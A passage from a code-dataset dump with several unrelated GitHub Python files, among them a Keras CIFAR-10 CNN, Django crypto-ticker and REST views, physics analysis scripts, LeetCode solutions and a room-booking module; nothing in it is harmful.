kernel_size=(3, 3), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(MaxPooling2D(pool_size = (2,2)))\r\n model_sieci.add(Flatten())\r\n model_sieci.add(Dense(1024, activation='relu'))\r\n model_sieci.add(Dense(10, activation='softmax'))\r\n return model_sieci\r\n\r\ndef dodaj_warstwy_do_sieci_wariant2():\r\n model_sieci = Sequential()\r\n model_sieci.add(Conv2D(32, kernel_size=(2, 2), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(Conv2D(32, kernel_size=(5, 5), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(MaxPooling2D(pool_size = (2,2)))\r\n model_sieci.add(Flatten())\r\n model_sieci.add(Dropout(0.25))\r\n model_sieci.add(Dense(1024, activation='relu'))\r\n model_sieci.add(Dense(10, activation='softmax'))\r\n return model_sieci\r\n\r\ndef dodaj_warstwy_do_sieci_wariant3():\r\n model_sieci = Sequential()\r\n model_sieci.add(Conv2D(32, kernel_size=(2, 2), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(Conv2D(32, kernel_size=(1, 1), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(Conv2D(32, kernel_size=(5, 5), activation='relu', input_shape=(32, 32, 3)))\r\n model_sieci.add(MaxPooling2D(pool_size = (2,2)))\r\n model_sieci.add(Flatten())\r\n model_sieci.add(Dense(1024, activation='relu'))\r\n model_sieci.add(Dropout(0.25))\r\n model_sieci.add(Dense(612, activation='relu'))\r\n model_sieci.add(Dense(10, activation='softmax'))\r\n return model_sieci\r\n\r\ndef pokaz_wykres_dla_skutecznosci():\r\n plt.plot(Historia_treningu.history['acc'])\r\n plt.plot(Historia_treningu.history['val_acc'])\r\n plt.title('skutecznosc modelu')\r\n plt.ylabel('dokladnosc')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n \r\n \r\ndef pokaz_wykres_dla_bledow():\r\n plt.plot(Historia_treningu.history['loss'])\r\n plt.plot(Historia_treningu.history['val_loss'])\r\n plt.title('bledy modelu')\r\n plt.ylabel('blad')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'test'], loc='upper left')\r\n plt.show()\r\n \r\n \r\nLiczba_przykladow_treningowych = 5000;\r\nLiczba_przykladow_testowych = 1000;\r\nRozmiar_batch = 100;\r\nLiczba_epok = 50;\r\n \r\nBatch1=wypakuj_plik('dataset/data_batch_1')\r\nBatch2=wypakuj_plik('dataset/data_batch_2')\r\nBatch3=wypakuj_plik('dataset/data_batch_3')\r\nBatch4=wypakuj_plik('dataset/data_batch_4')\r\nBatch5=wypakuj_plik('dataset/data_batch_5')\r\nBatch_test = wypakuj_plik('dataset/test_batch')\r\n\r\nPrzyklady_treningowe = przygotuj_dane_przykladow_treningowych()\r\nKategorie_treningowe = przygotuj_dane_kategorie_przykladow_treningowych()\r\nPrzyklady_testowe = przygotuj_dane_przykladow_testowych()\r\nKategorie_testowe = przygotuj_dane_kategorii_przykladow_testowych()\r\n\r\n\r\nModel_sieci = dodaj_warstwy_do_sieci_wariant2()\r\n\r\nModel_sieci.compile(loss='categorical_crossentropy', optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\nHistoria_treningu = Model_sieci.model.fit(Przyklady_treningowe / 255.0, to_categorical(Kategorie_treningowe),\r\n batch_size=Rozmiar_batch,\r\n epochs=Liczba_epok,\r\n validation_data=(Przyklady_testowe / 255.0, to_categorical(Kategorie_testowe)))\r\n\r\npokaz_wykres_dla_skutecznosci()\r\npokaz_wykres_dla_bledow()\r\n\r\n\r\n\r\n \r\n\r\n ","repo_name":"mehow1/licencjat","sub_path":"projekt.py","file_name":"projekt.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"13686273939","text":"from django.shortcuts import render\nfrom django.views import generic\nfrom django.views.generic import TemplateView\nimport requests\nimport json\nimport datetime\n\nclass IndexTemplateView(TemplateView):\n template_name = 'index.html'\n coinList = []\n\n def coinView(parameter_list):\n URL = 'https://coincheck.com/api/ticker'\n coincheck = requests.get(URL).json()\n for key, item in coincheck.items():\n data = (\"%-9s : %-10.9s \" % (key, item))\n coinList.append(data)\n\n # coins = {'BTC': 'btc_jpy', 'ETH': 'eth_jpy',\n # 'XEM': 'xem_jpy', 'BCH': 'bch_jpy'}\n\n # URL = 'https://coincheck.com/api/rate/'\n\n # for key, item in coins.items():\n # coincheck = requests.get(URL+item).json()\n # print(\"%-4s : %-10s\" % (key, coincheck['rate']))\n # pass\n\n\ndef coinfunc(request):\n URL = 'https://coincheck.com/api/ticker'\n coincheck = requests.get(URL).json()\n coinList = []\n\n\n #coincheck\n for key, item in coincheck.items():\n data = (\"%-9s : %-10.9s \" % (key, item))\n coinList.append(data)\n\n #zaif\n URL = 'https://api.zaif.jp/api/1/ticker/btc_jpy'\n zaif = requests.get(URL).json()\n zaifList = []\n #coincheck\n for key, item in zaif.items():\n data = (\"%-9s : %-10.9s \" % (key, item))\n zaifList.append(data)\n\n #context\n context = {\n 'coinList': coinList,\n 'zaif': zaifList,\n }\n\n\n #return\n return render(request, 'index.html', context)\n\n\n","repo_name":"ShotaHirabayashi/cointrade","sub_path":"coinchart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41508349447","text":"n=int(input())\ncheck=False\nl=input().split()\nfor i in range(0,len(l)-1):\n if int(l[i]) * int(l[i+1]) >0:\n check=True\n\n\nif check==True:\n print(\"YES\")\nelse:\n print(\"NO\") ","repo_name":"kanatturarbek/Webb","sub_path":"Lab7/informatics/Part4/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72121224689","text":"from rest_framework.views import APIView\r\nfrom rest_framework import status\r\nfrom rest_framework.response import Response\r\nfrom django.shortcuts import get_object_or_404\r\n\r\nfrom .models import (\r\n AgilePrinciples,\r\n AgileValues,\r\n)\r\nfrom .serializers import (\r\n AgileValueSerializer,\r\n AgilePrincipleSerializer,\r\n)\r\n\r\n# Create your views here.\r\n\r\nclass AgileValuesViewset(APIView):\r\n serializer_class = AgileValueSerializer\r\n # Retreived all data from database\r\n def get(self,request):\r\n agile_values = AgileValues.objects.all()\r\n serializer = AgileValueSerializer(agile_values,many=True)\r\n\r\n return Response(serializer.data, status=status.HTTP_200_OK)\r\n # Create new instance in database\r\n def post(self,request):\r\n data = request.data\r\n serializer = AgileValueSerializer(data=data)\r\n serializer.is_valid(raise_exception=True)\r\n self.perform_create(serializer)\r\n\r\n return Response(serializer.validated_data, status=status.HTTP_201_CREATED)\r\n \r\n def perform_create(self,serializer):\r\n return serializer.save()\r\n\r\n\r\n\r\nclass AgilePrincipleViewset(APIView):\r\n serializer_class = AgilePrincipleSerializer\r\n # Retreived data from database\r\n def get(self,request):\r\n agile_principles = AgilePrinciples.objects.all()\r\n serializer = AgilePrincipleSerializer(agile_principles,many=True)\r\n\r\n return Response(serializer.data, status=status.HTTP_200_OK)\r\n # create instance on the database\r\n def post(self,request):\r\n data = request.data\r\n serializer = AgilePrincipleSerializer(data=data)\r\n serializer.is_valid(raise_exception=True)\r\n self.perform_create(serializer)\r\n\r\n return Response(serializer.validated_data, status=status.HTTP_201_CREATED)\r\n \r\n def perform_create(self,serializer):\r\n return serializer.save()\r\n \r\n","repo_name":"fragnatic62/AgileApi","sub_path":"context_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40135914047","text":"#!python\n\nimport argparse\nimport os.path\nimport json\nimport hexflower.parser as Parser\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n\n parser.add_argument(\"-c\", \"--config\", required=True, type=str,\n help=\"Path to the hex-flower configuration JSON file\")\n parser.add_argument(\"-s\", \"--steps\", required=True, type=int,\n help=\"Number of navigation steps to take in the hex-flower\")\n parser.add_argument(\"-i\", \"--start\", required=False, type=int,\n help=\"Override the starting hex number from the configuration file\")\n\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n\n if args.steps <= 0:\n raise ValueError(\"The number of steps to take must be positive\")\n if not os.path.isfile(args.config):\n raise FileNotFoundError(\n f\"The config file '{args.config}' cannot be found\")\n\n with (open(args.config)) as config_data:\n json_config = json.load(config_data)\n flower_config = Parser.parse_config(json_config)\n current_hex = flower_config.get_starting_hex()\n print(current_hex)\n\n for i in range(0, args.steps):\n current_hex = flower_config.navigate(current_hex)\n print(current_hex)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"freohr/hexflower-roller","sub_path":"hexflower.py","file_name":"hexflower.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31603107527","text":"import RPi.GPIO as GPIO\nimport time\nfrom math import *\nfrom random import *\n\noff = True\nwhile True:\n\tlevel = int(input(\"Input: \"))\n\n\tif level > 1 or level < 0:\n\t\tbreak\n\tif level == 1 and off:\n\t\toff = False\n\t\tGPIO.setmode(GPIO.BOARD)\n\t\tGPIO.setup(23, GPIO.OUT)\n\t\tGPIO.output(23, 0)\n\telif level == 0 and not off:\n\t\toff = True\n\t\tGPIO.cleanup()\nGPIO.cleanup()\n","repo_name":"VladBargin/CompLocker","sub_path":"scripts/old_scripts/relu.py","file_name":"relu.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"34010662909","text":"'''\n\nDump candidate information in the approved SMP-ZZ sync format.\n\nIt's often useful to get a list of run:lumi:evt only, with something like\n\n$ cut -d ':' -f -3\n\nThe events are sorted by run, then lumi, then event, the same as processing\nthe same-but-unsorted output with the Unix command\n\n$ sort -t : -k 1n -k 2n -k 3n\n\nAuthor: N. Woods, U. Wisconsin\n\n'''\n\nimport logging\nfrom rootpy import log as rlog; rlog = rlog['/smpSync']\nlogging.basicConfig(level=logging.WARNING)\nrlog[\"/ROOT.TUnixSystem.SetDisplay\"].setLevel(rlog.ERROR)\nrlog[\"/rootpy.tree.chain\"].setLevel(rlog.WARNING)\n\nfrom ZZAnalyzer.utils.helpers import evVar, objVar, nObjVar, parseChannels, zMassDist\n\nfrom rootpy import asrootpy\nfrom rootpy.io import root_open\nfrom rootpy.tree import TreeChain\nimport argparse\nfrom glob import glob\nfrom os import environ\nfrom os.path import join\n\n\ndef getObjects(channel):\n nObj = {}\n for letter in channel:\n if letter not in nObj:\n nObj[letter] = 1\n else:\n nObj[letter] += 1\n out = []\n for letter in nObj:\n if nObj[letter] == 1:\n out.append(letter)\n else:\n out += [letter+str(n+1) for n in range(nObj[letter])]\n return sorted(out)\n\n\ndef getEventInfo(row, *args):\n return {\n 'run' : evVar(row, 'run'),\n 'event' : evVar(row, 'evt'),\n 'lumi' : evVar(row, 'lumi'),\n }\n\n\ndef getCandInfo(row, hPUWt, *objects):\n numbers = {}\n numbers['run'] = row.run\n numbers['lumi'] = row.lumi\n numbers['event'] = row.evt\n numbers['m4l'] = evVar(row, 'Mass')\n numbers['mZ1'] = nObjVar(row, 'Mass', objects[0], objects[1])\n numbers['mZ2'] = nObjVar(row, 'Mass', objects[2], objects[3])\n\n # eemm channel may have masses swapped\n if zMassDist(numbers['mZ1']) > zMassDist(numbers['mZ2']):\n temp = numbers['mZ2']\n numbers['mZ2'] = numbers['mZ1']\n numbers['mZ1'] = temp\n\n jetPts = evVar(row, 'jetPt')\n numbers['nJets'] = jetPts.size()\n if jetPts.size():\n numbers['jet1pt'] = jetPts.at(0)\n if jetPts.size() > 1:\n numbers['jet2pt'] = jetPts.at(1)\n else:\n numbers['jet2pt'] = -1.\n else:\n numbers['jet1pt'] = -1.\n numbers['jet2pt'] = -1.\n\n numbers['puWt'] = hPUWt.GetBinContent(hPUWt.FindBin(evVar(row, 'nTruePU')))\n recoSF = 1.\n selSF = 1.\n for ob in objects:\n if ob[0] == 'm':\n selSF *= objVar(row, 'EffScaleFactor', ob)\n else:\n recoSF *= objVar(row, 'TrkRecoEffScaleFactor', ob)\n selSF *= objVar(row, 'IDIsoEffScaleFactor', ob)\n\n numbers['recoSF'] = recoSF\n numbers['selSF'] = selSF\n\n numbers['nPU'] = evVar(row, 'nTruePU')\n\n numbers['mjj'] = max(-1.,evVar(row, 'mjj'))\n\n return numbers\n\n\ndef getGenCandInfo(row, hPUWt, *objects):\n numbers = {}\n numbers['mZ1'] = nObjVar(row, 'Mass', objects[0], objects[1])\n if numbers['mZ1'] < 60.:\n return None\n numbers['mZ2'] = nObjVar(row, 'Mass', objects[2], objects[3])\n if numbers['mZ2'] < 60.:\n return None\n\n # eemm channel may have masses swapped\n if zMassDist(numbers['mZ1']) > zMassDist(numbers['mZ2']):\n temp = numbers['mZ2']\n numbers['mZ2'] = numbers['mZ1']\n numbers['mZ1'] = temp\n\n numbers['run'] = row.run\n numbers['lumi'] = row.lumi\n numbers['event'] = row.evt\n numbers['m4l'] = evVar(row, 'Mass')\n\n jetPts = evVar(row, 'jetPt')\n numbers['nJets'] = jetPts.size()\n if jetPts.size():\n numbers['jet1pt'] = jetPts.at(0)\n if jetPts.size() > 1:\n numbers['jet2pt'] = jetPts.at(1)\n else:\n numbers['jet2pt'] = -1.\n else:\n numbers['jet1pt'] = -1.\n numbers['jet2pt'] = -1.\n\n numbers['mjj'] = max(-1.,evVar(row, 'mjj'))\n\n return numbers\n\n\ndef getCandInfo3l(row, hPUWt, *objects):\n numbers = {}\n numbers['run'] = row.run\n numbers['lumi'] = row.lumi\n numbers['event'] = row.evt\n numbers['m3l'] = evVar(row, 'Mass')\n numbers['mZ'] = nObjVar(row, 'Mass', objects[0], objects[1])\n numbers['ptL3'] = objVar(row, 'Pt', objects[2])\n numbers['l3Tight'] = 1 if objVar(row, 'ZZTightID', objects[2]) and objVar(row, 'ZZIsoPass', objects[2]) else 0\n\n return numbers\n\n\ndef getAllInfo(channel, ntuple, fInfo, hPUWt):\n found = set()\n objects = getObjects(channel)\n if channel == 'emm':\n objects = objects[1:]+objects[:1]\n\n for row in ntuple:\n numbers = fInfo(row, hPUWt, *objects)\n if numbers is None:\n continue\n evtID = (numbers['run'],numbers['lumi'],numbers['event'])\n if evtID in found:\n continue\n found.add(evtID)\n yield numbers\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dump information about the 4l candidates in an ntuple to a text file, for synchronization.')\n parser.add_argument('input', type=str, nargs=1, help='Input root file or glob to several')\n parser.add_argument('output', type=str, nargs='?', default='candSync.txt',\n help='Name of the text file to output.')\n parser.add_argument('channels', nargs='?', type=str, default='zz',\n help='Comma separated (no spaces) list of channels, or keyword indicated multiple channels')\n parser.add_argument('--listOnly', action='store_true',\n help='Print only run:lumi:event with no further info')\n parser.add_argument('--zPlusL', '--zPlusl', action='store_true',\n help='Use the Z+l control region format instead of the 4l format')\n parser.add_argument('--doGen', action='store_true',\n help='Also make a file for the gen-level information')\n parser.add_argument('--puWeightFile', nargs='?', type=str,\n default='puWeight_69200_24jan2017.root',\n help='Name of pileup weight file, possibly relative to $zza/ZZAnalyzer/data/pileupReweighting/')\n\n\n args = parser.parse_args()\n\n with root_open(join(environ['zza'], 'ZZAnalyzer', 'data',\n 'pileupReweighting', args.puWeightFile)) as fPU:\n hPUWt = asrootpy(fPU.puScaleFactor)\n hPUWt.SetDirectory(0)\n\n if args.zPlusL and args.channels == 'zz':\n args.channels = 'zl'\n channels = parseChannels(args.channels)\n\n inFiles = glob(args.input[0])\n\n outStrings = []\n outStringsGen = []\n\n if args.listOnly:\n outTemp = '{run}:{lumi}:{event}:{channel}\\n'\n infoGetter = getEventInfo\n elif args.zPlusL:\n outTemp = ('{run}:{lumi}:{event}:{channel}:{m3l:.2f}:{mZ:.2f}:{ptL3:.2f}:'\n '{l3Tight}\\n')\n infoGetter = getCandInfo3l\n args.doGen = False\n\n else:\n outTemp = ('{run}:{lumi}:{event}:{channel}:{m4l:.2f}:{mZ1:.2f}:{mZ2:.2f}:'\n '{nJets}:{jet1pt:.2f}:{jet2pt:.2f}:{mjj:.2f}:{puWt:.4f}:{recoSF:.4f}:{selSF:.4f}:{nPU:.2f}\\n')\n infoGetter = getCandInfo\n\n outTempGen = ('{run}:{lumi}:{event}:{channel}:{m4l:.2f}:{mZ1:.2f}:{mZ2:.2f}:'\n '{nJets}:{jet1pt:.2f}:{jet2pt:.2f}:{mjj:.2f}\\n')\n\n for channel in channels:\n if channel == 'emm':\n channelForStr = 'mme' # for sync with Torino\n else:\n channelForStr = channel\n\n if len(inFiles) == 1:\n with root_open(inFiles[0]) as fin:\n n = fin.Get(channel+'/ntuple')\n for numbers in getAllInfo(channel, n, infoGetter, hPUWt):\n outStrings.append(outTemp.format(channel=channelForStr,\n **numbers))\n if args.doGen:\n n = fin.Get(channel+'Gen/ntuple')\n for numbers in getAllInfo(channel, n, getGenCandInfo, hPUWt):\n outStringsGen.append(outTempGen.format(channel=channelForStr,\n **numbers))\n\n else:\n n = TreeChain(channel+'/ntuple', inFiles)\n for numbers in getAllInfo(channel, n, infoGetter, hPUWt):\n outStrings.append(outTemp.format(channel=channelForStr,\n **numbers))\n if args.doGen:\n n = TreeChain(channel+'Gen/ntuple', inFiles)\n for numbers in getAllInfo(channel, n, getGenCandInfo, hPUWt):\n outStringsGen.append(outTempGen.format(channel=channelForStr,\n **numbers))\n\n with open(args.output, 'w') as fout:\n for s in sorted(outStrings, key=lambda x: [int(y) for y in x.split(':')[:3]]):\n fout.write(s)\n\n if args.doGen:\n if '.' in args.output:\n outputGen = 'Gen.'.join(args.output.rsplit('.',1))\n else:\n outputGen = args.output+'Gen'\n\n with open(outputGen, 'w') as fout:\n for s in sorted(outStringsGen, key=lambda x: [int(y) for y in x.split(':')[:3]]):\n fout.write(s)\n\n","repo_name":"nwoods/ZZAnalyzer","sub_path":"ZZAnalyzer/utils/scripts/smpSync.py","file_name":"smpSync.py","file_ext":"py","file_size_in_byte":9043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"26099693192","text":"#!/usr/bin/env python3\n\nimport argparse\nimport requests\nfrom bioschemas_indexer import indexer\n\n\n# MAIN\nparser = argparse.ArgumentParser('Run a test query against the Solr instance')\nparser.add_argument('query')\nargs = parser.parse_args()\n\n_, solr = indexer.read_conf()\nsolrQueryPath = 'http://' + solr['SOLR_SERVER'] + ':' + \\\n solr['SOLR_PORT'] + '/solr/' + solr['SOLR_CORE'] + '/select'\n\nparams = {'q': args.query, 'defType': 'edismax'}\n\nr = requests.get(solrQueryPath, params=params)\nprint(r.url)\nprint(r.text)\n","repo_name":"buzzbangorg/bsbang-indexer","sub_path":"bsbang-query.py","file_name":"bsbang-query.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23999107074","text":"import numpy as np\nimport torch\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom neural_clf.controllers.clf_qp_net import CLF_QP_Net\nfrom models.pvtol import (\n control_affine_dynamics,\n u_nominal,\n n_controls,\n n_dims,\n low_m,\n high_m,\n low_I,\n high_I,\n)\n\n\n# Beautify plots\nsns.set_theme(context=\"talk\", style=\"white\")\n\n# Load the model from file\nfilename = \"logs/pvtol_robust_clf_qp.pth.tar\"\ncheckpoint = torch.load(filename)\nscenarios = [\n {\"m\": low_m, \"inertia\": low_I},\n # {\"m\": low_m, \"inertia\": low_I},\n # {\"m\": low_m, \"inertia\": low_I},\n # {\"m\": low_m, \"inertia\": low_I},\n]\nnominal_scenario = scenarios[0]\nclf_net = CLF_QP_Net(n_dims,\n checkpoint['n_hidden'],\n n_controls,\n checkpoint['clf_lambda'],\n checkpoint['relaxation_penalty'],\n control_affine_dynamics,\n u_nominal,\n scenarios,\n nominal_scenario)\nclf_net.load_state_dict(checkpoint['clf_net'])\n\nwith torch.no_grad():\n n_grid = 100\n x = torch.linspace(-4, 4, n_grid)\n z = torch.linspace(-4, 4, n_grid)\n grid_x, grid_z = torch.meshgrid(x, z)\n residuals = torch.zeros(n_grid, n_grid)\n V_values = torch.zeros(n_grid, n_grid)\n V_dot_values = torch.zeros(n_grid, n_grid)\n print(\"Plotting V on grid...\")\n for i in tqdm(range(n_grid)):\n for j in range(n_grid):\n # Get the residual from running the model\n q = torch.zeros(1, n_dims)\n # q = torch.tensor([[0.0129, -0.1149, -0.0083, 0.0534, -2.0552, 0.0201]])\n q[0, 0] = x[i]\n q[0, 1] = z[j]\n _, r, V, V_dot = clf_net(q)\n residuals[j, i] = r\n V_values[j, i] = V\n V_dot_values[j, i] = V_dot\n\n fig, axs = plt.subplots(1, 2)\n fig.set_size_inches(17, 8)\n contours = axs[0].contourf(x, z, V_values, cmap=\"magma\", levels=20)\n plt.colorbar(contours, ax=axs[0], orientation=\"horizontal\")\n contours = axs[0].contour(x, z, V_values, colors=[\"blue\"], levels=[checkpoint[\"safe_level\"]])\n axs[0].plot([x.min(), x.max()], [checkpoint[\"safe_z\"], checkpoint[\"safe_z\"]],\n c=\"g\", label=\"Safe\")\n axs[0].plot([x.min(), x.max()], [checkpoint[\"unsafe_z\"], checkpoint[\"unsafe_z\"]],\n c=\"r\", label=\"Unsafe\")\n safe_circle = plt.Circle((0.0, 0.0), 3.0, color='g', fill=False)\n unsafe_circle = plt.Circle((0.0, 0.0), 3.5, color='r', fill=False)\n axs[0].add_patch(safe_circle)\n axs[0].add_patch(unsafe_circle)\n axs[0].set_xlabel('$x$')\n axs[0].set_ylabel('$z$')\n axs[0].set_title('$V$')\n axs[0].legend()\n\n contours = axs[1].contourf(x, z, V_dot_values, cmap=\"magma\", levels=20)\n plt.colorbar(contours, ax=axs[1], orientation=\"horizontal\")\n axs[1].set_xlabel('$x$')\n axs[1].set_ylabel('$z$')\n axs[1].set_title('$dV/dt$')\n\n # plt.savefig(\"logs/plots/pvtol/lyap_contour.png\")\n plt.show()\n","repo_name":"dawsonc/neural_clbf_experiments","sub_path":"neural_clf/plotting/pvtol_robust_clf_qp_V.py","file_name":"pvtol_robust_clf_qp_V.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"6610277358","text":"import os\nimport sys\n\nif len(sys.argv) != 2:\n print (\"Usage: python liccopy.py dirname\")\n quit()\n\nindir = sys.argv[1]\n \ncstmt = \"# Copyright 2020 by B. Knueven, D. Mildebrath, C. Muir, J-P Watson, and D.L. Woodruff\"\nlic = \"# This software is distributed under the 3-clause BSD License.\"\n\npyomoscent = \"# Pyomo: Python Optimization Modeling Objects\"\n\n\ndef _get_file(filepath):\n cline = -1\n licline = -1\n pyomofile = False\n with open(filepath,'r') as f:\n lines = f.readlines()\n for lno, line in enumerate(lines):\n if cstmt in line:\n cline = lno\n print\n if lic in line:\n licline = lno\n if pyomoscent in line:\n pyomofile = True\n return lines, cline, licline, pyomofile\n\n\ndef _write_file(filepath, lines, cline, licline, pyomofile):\n print (filepath, end='')\n\n if pyomofile:\n print(\": seems to have Pyomo header; skipping\")\n return\n \n cbefore = -1 # if only adding copyright\n licbefore = -1 # if only adding license\n if cline == -1 and licline != -1:\n cbefore = licline\n if cline != -1 and licline == -1:\n licbefore = licline + 1\n if cline != -1 and licline != -1:\n print(\" .\")\n return\n \n with open(filepath, \"w\") as f:\n if cline == -1 and licline == -1:\n f.write(cstmt+'\\n')\n f.write(lic+'\\n')\n print(\": add both\")\n for lno, line in enumerate(lines):\n if cbefore == lno:\n f.write(cstmt+'\\n')\n print(\": add copyright\")\n if licbefore == lno:\n f.write(lic+'\\n')\n print(\": add license\")\n f.write(line)\n\n\nfor subdir, dirs, files in os.walk(indir):\n for filename in files:\n filepath = subdir + os.sep + filename\n\n if filepath.endswith(\".py\"):\n lines, cline, licline, pyomofile = _get_file(filepath)\n _write_file(filepath, lines, cline, licline, pyomofile)\n \n","repo_name":"Pyomo/mpi-sppy","sub_path":"mpisppy/utils/liccopy.py","file_name":"liccopy.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"20"} +{"seq_id":"6732338708","text":"import math\n\ninput = open('../data/p6_data.txt', 'r')\n\nraw_input = input.read()\ngroups = raw_input.split('\\n\\n')\n\nsum = 0\nfor group in groups:\n people = group.split('\\n')\n if len(people) == 1:\n sum += len(people[0])\n else:\n common_ans = set(people[0])\n for person in people[1:]:\n common_ans = common_ans.intersection(person)\n sum += len(common_ans)\n\nprint(sum)","repo_name":"mboylevt/adventofcode","sub_path":"2020/problems/p6_2.py","file_name":"p6_2.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"40287866858","text":"from functools import lru_cache\nclass Solution:\n\tdef minDistance(self, word1: str, word2: str) -> int:\n\t\tn, m = len(word1), len(word2)\n\t\tdp = [[float('inf')] * (m + 1) for _ in range(n + 1)]\n\t\tdp[0] = [i for i in range(m + 1)]\n\t\t\n\t\tfor i in range(1, n + 1):\n\t\t\tfor j in range(m + 1):\n\t\t\t\tif j == 0:\n\t\t\t\t\tdp[i][j] = i\n\t\t\t\t\tcontinue\n\t\t\t\tdp[i][j] = 1 + min(dp[i - 1][j - 1], dp[i][j - 1], dp[i - 1][j])\n\t\t\t\tif word1[i - 1] == word2[j - 1]:\n\t\t\t\t\tdp[i][j] = min(dp[i][j], dp[i - 1][j - 1])\n\t\tprint(dp)\n\t\treturn dp[-1][-1]\n\t\na = Solution()\nword1 = \"horse\"; word2 = \"ros\"\t\n#word1 = \"b\"; word2 = \"abc\"\n#word1 = \"intention\"; word2 = \"execution\"\nprint(a.minDistance(word1, word2))\t\t\t\n\t\t\t\n\n\n","repo_name":"Mvitimin/Python_algorithms","sub_path":"DynamicProgramming/edit-distance_1.py","file_name":"edit-distance_1.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"37155673808","text":"# Given an m x n grid of characters board and a string word, return true if word exists in the grid.\n\n# The word can be constructed from letters of sequentially adjacent cells, where adjacent cells are horizontally or vertically neighboring. The same letter cell may not be used more than once.\n\n\n# Example 1:\n\n# Input: board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]], word = \"ABCCED\"\n# Output: true\n\n\n# Example 2:\n\n# Input: board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]], word = \"SEE\"\n# Output: true\n\n# Example 3:\n\n# Input: board = [[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]], word = \"ABCB\"\n# Output: false\n \n\n# Constraints:\n\n# m == board.length\n# n = board[i].length\n# 1 <= m, n <= 6\n# 1 <= word.length <= 15\n# board and word consists of only lowercase and uppercase English letters.\n \n\nclass Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n ROWS = len(board)\n COLS = len(board[0])\n cache = set()\n\n def dfs(i,j, x):\n if x == len(word):\n return True\n if (i < 0 or j < 0 or \n i >= ROWS or j >= COLS or\n (i,j) in cache or\n board[i][j] != word[x]):\n return False\n \n cache.add((i,j))\n \n res = (dfs(i+1, j, x+1) or\n dfs(i-1, j, x+1) or\n dfs(i, j+1, x+1) or\n dfs(i, j-1, x+1))\n cache.remove((i,j))\n return res\n\n for r in range(ROWS):\n for c in range(COLS):\n if dfs(r, c, 0): return True\n\n return False\n \n\n# Runtime 7708 ms Beats 49.60%\n# Memory 16.3 MB Beats 74.74%","repo_name":"shawngonsalves/LeetCode_Challenges","sub_path":"Medium_WordSearch.py","file_name":"Medium_WordSearch.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"70812077489","text":"from datetime import timedelta\n\nfrom crbs.constants import (\n ACTION_NOT_ALLOWED,\n ALLOWED_CANCELLATION_IN_ADVANCE_MINUTES,\n ALLOWED_CANCELLATION_IN_ADVANCE_SECONDS,\n SEPARATOR,\n VALUE_PROMPT,\n END_DATETIME_PROMPT,\n START_DATETIME_PROMPT,\n)\nfrom crbs.entities import equipments\nfrom crbs.permissions import (\n check_if_user_allowed_to_book_room,\n check_if_user_allowed_to_see_all_bookings,\n)\nfrom crbs.utils import (\n check_booking_limit,\n create_booking,\n get_available_booking_limit_quota,\n get_available_conference_rooms,\n get_booking_details,\n get_bookings,\n get_current_datetime_ist,\n get_datetime_obj_from_str_ist,\n get_user_details,\n print_items_from_list,\n show_suitable_rooms,\n)\nfrom crbs.validations import validate_duration\n\n\ndef show_available_rooms():\n print(f\"{SEPARATOR}\\n\\t\\t\\tSHOW AVAILABLE ROOMS\\n\")\n from_datetime = input(START_DATETIME_PROMPT)\n to_datetime = input(END_DATETIME_PROMPT)\n from_datetime_obj_ist = get_datetime_obj_from_str_ist(from_datetime)\n to_datetime_obj_ist = get_datetime_obj_from_str_ist(to_datetime)\n validate_duration(from_datetime_obj_ist, to_datetime_obj_ist, True)\n available_rooms = get_available_conference_rooms(\n from_datetime_obj_ist, to_datetime_obj_ist\n )\n 